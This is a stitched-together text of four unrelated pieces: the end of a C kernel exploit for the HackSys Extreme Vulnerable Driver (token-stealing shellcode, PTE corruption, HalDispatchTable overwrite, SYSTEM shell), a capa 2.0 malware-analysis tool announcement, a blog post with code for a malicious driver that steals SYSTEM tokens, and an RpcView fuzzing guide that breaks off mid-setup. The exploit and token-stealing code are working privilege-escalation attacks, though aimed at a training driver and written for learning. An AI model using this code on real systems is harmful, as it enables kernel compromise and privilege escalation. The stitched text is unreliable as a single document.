    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i < 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Move to the next QWORD of KUSER_SHARED_DATA+0x800
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}

capa 2.0: Better, Faster, Stronger

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and check out the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor, allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in highly optimized routines, such as memcpy, to opt in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time creating a comprehensive FLIRT signature set for the common malware analysis use case. The signatures come included with capa and are also available on our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpkg and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Stealing Tokens In Kernel Mode With A Malicious Driver


Introduction

I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.

The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.

About Access Tokens

A common method of escalating privileges via buggy drivers or kernel mode exploits is to steal the access token of a SYSTEM process and assign it to a process of your choosing. However, this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.

Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However, it is important to know how the access token structure is associated with each process.

Processes And The _EPROCESS Structure

Each process is represented in the kernel by an _EPROCESS structure, and these structures are linked together in a doubly linked list. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes, this is just an implementation detail. This Token member contains a pointer to the address of the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:

Token in WinDbg

As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8.

The Method

Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.

The Driver

Instead of exploiting a kernel mode vulnerability, I wrote a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes a struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.

PID Struct
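
The structure itself only appears as a screenshot in the original post, so here is a minimal sketch of what it might look like in C (the member names are my own and not taken from the driver source):

typedef struct _STEAL_TOKEN_INPUT
{
    unsigned long SourcePid;  // PID of the process to steal the token from
    unsigned long TargetPid;  // PID of the process to elevate
} STEAL_TOKEN_INPUT, *PSTEAL_TOKEN_INPUT;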

The driver will find the _EPROCESS structure for each PID, locate the Token member of each, and copy the token of the process being stolen from to the process being elevated.

The User Mode Program

The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.

User Mode Code
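
As a rough sketch, assuming a hypothetical device name and IOCTL value (the real ones live in the linked repository), the user mode side could look like this:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Hypothetical device name and IOCTL code; the real values depend on the driver.
#define DEVICE_NAME L"\\\\.\\TokenStealer"
#define IOCTL_STEAL_TOKEN CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

// Same hypothetical input structure as above
typedef struct _STEAL_TOKEN_INPUT
{
    unsigned long SourcePid;
    unsigned long TargetPid;
} STEAL_TOKEN_INPUT;

int wmain(int argc, wchar_t* argv[])
{
    if (argc != 3)
    {
        wprintf(L"Usage: %s <source PID> <target PID>\n", argv[0]);
        return 1;
    }

    // Open a handle to the driver's device object by name
    HANDLE device = CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                                0, NULL, OPEN_EXISTING, 0, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        wprintf(L"[-] Unable to open the device. Error: %lu\n", GetLastError());
        return 1;
    }

    // Build the input structure from the command line arguments
    STEAL_TOKEN_INPUT input = { 0 };
    input.SourcePid = wcstoul(argv[1], NULL, 10);
    input.TargetPid = wcstoul(argv[2], NULL, 10);

    // Ask the driver to copy the source process token to the target process
    DWORD bytesReturned = 0;
    if (!DeviceIoControl(device, IOCTL_STEAL_TOKEN, &input, sizeof(input),
                         NULL, 0, &bytesReturned, NULL))
    {
        wprintf(L"[-] DeviceIoControl failed. Error: %lu\n", GetLastError());
        CloseHandle(device);
        return 1;
    }

    wprintf(L"[+] PIDs sent to the driver successfully!\n");
    CloseHandle(device);
    return 0;
}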

The Driver Code

The code for the token copying is pretty straight forward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:

IOCTL Switch

Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:

Token Offset

We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:

Copy Token
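
Putting these three steps together, a stripped-down sketch of the kernel side might look like the following. The helper name is mine, the hardcoded 0x4b8 offset is specific to this Windows 10 20H2 build, and reference counting and error handling are kept to a minimum:

#include <ntddk.h>

#define TOKEN_OFFSET 0x4b8  // _EPROCESS Token offset on this Windows build

NTSTATUS StealToken(ULONG SourcePid, ULONG TargetPid)
{
    PEPROCESS SourceProcess = NULL;
    PEPROCESS TargetProcess = NULL;
    NTSTATUS Status;

    // Resolve both PIDs to their _EPROCESS structures
    Status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)SourcePid, &SourceProcess);
    if (!NT_SUCCESS(Status))
        return Status;

    Status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)TargetPid, &TargetProcess);
    if (!NT_SUCCESS(Status))
    {
        ObDereferenceObject(SourceProcess);
        return Status;
    }

    // Locate the Token member in each _EPROCESS and copy the source value over
    PULONG_PTR SourceToken = (PULONG_PTR)((ULONG_PTR)SourceProcess + TOKEN_OFFSET);
    PULONG_PTR TargetToken = (PULONG_PTR)((ULONG_PTR)TargetProcess + TOKEN_OFFSET);
    *TargetToken = *SourceToken;

    ObDereferenceObject(SourceProcess);
    ObDereferenceObject(TargetProcess);
    return STATUS_SUCCESS;
}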

The Whole Process

Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:

Whoami

Next we use the user mode program to pass the two PIDs to the driver. The first PID is that of the System process, which is always 4 on modern versions of Windows. We see that the driver was accessed and the PIDs passed to it successfully:

User Mode Program

In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:

Copy Token Debug View

Finally we run whoami again, and see that we are now SYSTEM!

Whoami System

We can even do the same thing with another user’s token:

Whoami 2

Conclusion

Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level helps you defend it more effectively. To dig deeper, I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE) and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists of looking for interesting keywords in the documentation and then experimenting by modifying the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly effective in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists of enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic to a neophyte, but there is nothing to worry about; that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

  • Visual Studio 2019 (Community)
  • CMake >= 3.13.2
  • Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once Visual Studio is installed, you have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is how do you find and download Qt5 5.15.2? That’s where things get a bit tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

